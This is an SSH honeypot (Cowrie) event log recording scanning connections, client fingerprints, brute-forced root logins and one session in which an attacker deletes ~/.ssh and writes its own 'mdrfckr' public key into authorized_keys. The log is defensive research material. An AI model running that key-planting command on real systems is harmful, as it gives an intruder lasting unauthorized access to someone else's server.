{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:31:06.372881Z","src_ip":"60.221.239.232","session":"e1dee107174a"}
{"eventid":"cowrie.session.closed","duration":"301.0","message":"Connection lost after 301.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:31:44.084141Z","src_ip":"60.221.239.232","session":"011d7e63d3f6"}
{"eventid":"cowrie.session.closed","duration":"212.2","message":"Connection lost after 212.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:34:23.749633Z","src_ip":"60.221.239.232","session":"b5ed4f0b9e70"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56930,"dst_ip":"1.2.3.4","dst_port":22,"session":"b65ffb67f758","protocol":"ssh","message":"New connection: 217.72.205.35:56930 (1.2.3.4:22) [session: b65ffb67f758]","sensor":"my-vps","timestamp":"2025-08-24T21:35:28.379569Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:35:28.380773Z","src_ip":"217.72.205.35","session":"b65ffb67f758"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":56536,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b5f9cb2be32","protocol":"ssh","message":"New connection: 3.131.215.38:56536 (1.2.3.4:22) [session: 4b5f9cb2be32]","sensor":"my-vps","timestamp":"2025-08-24T21:38:15.513199Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-24T21:38:15.514318Z","src_ip":"3.131.215.38","session":"4b5f9cb2be32"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:38:15.515172Z","src_ip":"3.131.215.38","session":"4b5f9cb2be32"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":57384,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1914d5815c8","protocol":"ssh","message":"New connection: 3.131.215.38:57384 (1.2.3.4:22) [session: d1914d5815c8]","sensor":"my-vps","timestamp":"2025-08-24T21:38:28.621790Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:38:28.795805Z","src_ip":"3.131.215.38","session":"d1914d5815c8"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":57388,"dst_ip":"1.2.3.4","dst_port":22,"session":"86f0cefc9693","protocol":"ssh","message":"New connection: 3.131.215.38:57388 (1.2.3.4:22) [session: 86f0cefc9693]","sensor":"my-vps","timestamp":"2025-08-24T21:38:28.836415Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-24T21:38:28.874620Z","src_ip":"3.131.215.38","session":"86f0cefc9693"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:38:28.875955Z","src_ip":"3.131.215.38","session":"86f0cefc9693"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":57670,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b30640b79df","protocol":"ssh","message":"New connection: 3.131.215.38:57670 (1.2.3.4:22) [session: 0b30640b79df]","sensor":"my-vps","timestamp":"2025-08-24T21:40:05.306207Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u01b3\u0014r\\x8e\\xec\\x81\\xe5/\\xa4V7\\x83\\xc0@\\xebdN\\x80\\xf9\\xc9d\\x94\\xe8{\u0015\\xdc=S\\xb7\\xb4\\xb3\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u01b3\u0014r\\x8e\\xec\\x81\\xe5/\\xa4V7\\x83\\xc0@\\xebdN\\x80\\xf9\\xc9d\\x94\\xe8{\u0015\\xdc=S\\xb7\\xb4\\xb3\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-24T21:40:06.905720Z","src_ip":"3.131.215.38","session":"0b30640b79df"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:40:06.906964Z","src_ip":"3.131.215.38","session":"0b30640b79df"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":57712,"dst_ip":"1.2.3.4","dst_port":22,"session":"40a3ad4b8277","protocol":"ssh","message":"New connection: 3.131.215.38:57712 (1.2.3.4:22) [session: 40a3ad4b8277]","sensor":"my-vps","timestamp":"2025-08-24T21:40:08.105932Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u001a14\u0013\\xaa\u074c\\xaf\u000e-\\xe1\\x86~\\xae\\xcdE7 \u0149NA\\x95n.+\\xcfJ/S\\xa4}\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u001a14\u0013\\xaa\u074c\\xaf\u000e-\\xe1\\x86~\\xae\\xcdE7 \u0149NA\\x95n.+\\xcfJ/S\\xa4}\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-24T21:40:08.119246Z","src_ip":"3.131.215.38","session":"40a3ad4b8277"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:40:08.120253Z","src_ip":"3.131.215.38","session":"40a3ad4b8277"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":54476,"dst_ip":"1.2.3.4","dst_port":22,"session":"764d79dddea6","protocol":"ssh","message":"New connection: 3.131.215.38:54476 (1.2.3.4:22) [session: 764d79dddea6]","sensor":"my-vps","timestamp":"2025-08-24T21:41:21.462522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T21:41:21.463545Z","src_ip":"3.131.215.38","session":"764d79dddea6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T21:41:21.580428Z","src_ip":"3.131.215.38","session":"764d79dddea6"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:41:31.463813Z","src_ip":"3.131.215.38","session":"764d79dddea6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55410,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4ed5c503af0","protocol":"ssh","message":"New connection: 217.72.205.35:55410 (1.2.3.4:22) [session: f4ed5c503af0]","sensor":"my-vps","timestamp":"2025-08-24T21:42:02.597785Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:42:02.599056Z","src_ip":"217.72.205.35","session":"f4ed5c503af0"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":44384,"dst_ip":"1.2.3.4","dst_port":22,"session":"2135d73d90f7","protocol":"ssh","message":"New connection: 45.88.8.215:44384 (1.2.3.4:22) [session: 2135d73d90f7]","sensor":"my-vps","timestamp":"2025-08-24T21:44:14.356385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T21:44:14.736269Z","src_ip":"45.88.8.215","session":"2135d73d90f7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T21:44:14.737136Z","src_ip":"45.88.8.215","session":"2135d73d90f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Badrinath@123","message":"login attempt [root/Badrinath@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:44:16.764802Z","src_ip":"45.88.8.215","session":"2135d73d90f7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:44:17.283142Z","src_ip":"45.88.8.215","session":"2135d73d90f7"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":45388,"dst_ip":"1.2.3.4","dst_port":22,"session":"931989eaef4c","protocol":"ssh","message":"New connection: 45.88.8.186:45388 (1.2.3.4:22) [session: 931989eaef4c]","sensor":"my-vps","timestamp":"2025-08-24T21:45:59.414401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T21:45:59.989624Z","src_ip":"45.88.8.186","session":"931989eaef4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T21:45:59.990271Z","src_ip":"45.88.8.186","session":"931989eaef4c"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123ASD!@#","message":"login attempt [root/asd123ASD!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:46:02.106519Z","src_ip":"45.88.8.186","session":"931989eaef4c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:46:02.636433Z","src_ip":"45.88.8.186","session":"931989eaef4c"}
{"eventid":"cowrie.session.connect","src_ip":"180.76.146.235","src_port":61774,"dst_ip":"1.2.3.4","dst_port":22,"session":"86bcaa29d9ed","protocol":"ssh","message":"New connection: 180.76.146.235:61774 (1.2.3.4:22) [session: 86bcaa29d9ed]","sensor":"my-vps","timestamp":"2025-08-24T21:47:05.733261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:47:05.734190Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:47:05.932882Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd2023","message":"login attempt [root/Abcd2023] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:47:06.769732Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:47:07.230713Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:47:07.231423Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:47:07.232227Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:07.432014Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:47:07.845682Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:47:07.846429Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:47:08.047033Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:08.047849Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.session.connect","src_ip":"180.76.146.235","src_port":62898,"dst_ip":"1.2.3.4","dst_port":22,"session":"279137c003b0","protocol":"ssh","message":"New connection: 180.76.146.235:62898 (1.2.3.4:22) [session: 279137c003b0]","sensor":"my-vps","timestamp":"2025-08-24T21:47:08.238209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:47:08.239156Z","src_ip":"180.76.146.235","session":"279137c003b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:47:08.431930Z","src_ip":"180.76.146.235","session":"279137c003b0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:47:09.245356Z","src_ip":"180.76.146.235","session":"279137c003b0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:10.440731Z","src_ip":"180.76.146.235","session":"279137c003b0"}
{"eventid":"cowrie.session.connect","src_ip":"180.76.146.235","src_port":64142,"dst_ip":"1.2.3.4","dst_port":22,"session":"6602ff08cf97","protocol":"ssh","message":"New connection: 180.76.146.235:64142 (1.2.3.4:22) [session: 6602ff08cf97]","sensor":"my-vps","timestamp":"2025-08-24T21:47:10.646734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:47:10.647659Z","src_ip":"180.76.146.235","session":"6602ff08cf97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:47:10.854175Z","src_ip":"180.76.146.235","session":"6602ff08cf97"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:47:11.721086Z","src_ip":"180.76.146.235","session":"6602ff08cf97"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:11.929306Z","src_ip":"180.76.146.235","session":"86bcaa29d9ed"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:11.930189Z","src_ip":"180.76.146.235","session":"6602ff08cf97"}
{"eventid":"cowrie.session.connect","src_ip":"117.34.125.173","src_port":52965,"dst_ip":"1.2.3.4","dst_port":22,"session":"05621cc8f720","protocol":"ssh","message":"New connection: 117.34.125.173:52965 (1.2.3.4:22) [session: 05621cc8f720]","sensor":"my-vps","timestamp":"2025-08-24T21:47:18.107591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:47:18.108736Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
